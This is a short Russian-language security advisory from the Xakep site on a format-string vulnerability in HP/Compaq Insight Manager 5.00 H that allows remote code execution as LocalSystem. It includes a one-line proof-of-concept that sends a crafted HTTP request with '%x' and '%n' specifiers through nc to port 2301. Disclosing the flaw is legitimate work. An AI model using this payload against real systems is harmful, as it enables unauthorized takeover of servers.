Удаленное выполнение произвольного кода в HP/Compaq Insight Manager

Рекомендуем почитать:

Xakep #299. Sysmon

Содержание выпуска
Подписка на «Хакер»-60%

Уязвимость обнаружена в HP/Compaq Insight Manager. Удаленный пользователь может выполнить произвольный код на системе.
Уязвимость форматной строки обнаружена в DebugSearchPaths HTTP запросе. Удаленный атакующий может выполнить произвольный код с LocalSystem привилегиями. Пример:

$ printf "GET /<\x21.DebugSearchPaths>? Url=`perl -e 'print "A"
x14'`BBBB`perl -e 'print ".%%x"x1208'`%%n> HTTP/1.0\n\n" | nc 192.168.235.131 2301

Уязвимость обнаружена в Compaq Insight Manager 5.00 H.

Удаленное выполнение произвольного кода в HP/Compaq Insight Manager

Xakep #299. Sysmon

Подпишись на наc в Telegram!

Из рубрики «Взлом»

WinAPI днем и ночью. Ищем способы обращения к нативному коду из C#

Обзор перспективных исследований. Колонка Дениса Макрушина

HTB Hospital. Получаем доступ к хосту через уязвимость Ghostscript

EIGRP Scam. Отравляем таблицу маршрутизации на Python

Трюки

Липовый соникс. Реверсим картридж Liposonix и пишем его эмулятор

Новая диета для Linux. Загружаем современный Linux, используя минимум памяти

Фишинг в соцсетях. Как социальные сети помогают хакерам

Сделай мне красиво! Изобретаем персональный нейросетевой фотоувеличитель

Последние новости

Microsoft случайно добавила Copilot в Windows Server

GPT-4 может эксплуатировать уязвимости, изучив связанные бюллетени безопасности

Cisco патчит уязвимость повышения привилегий в IMC

Стал доступен API для Stable Diffusion 3

Группа Core Werewolf попыталась атаковать российскую военную базу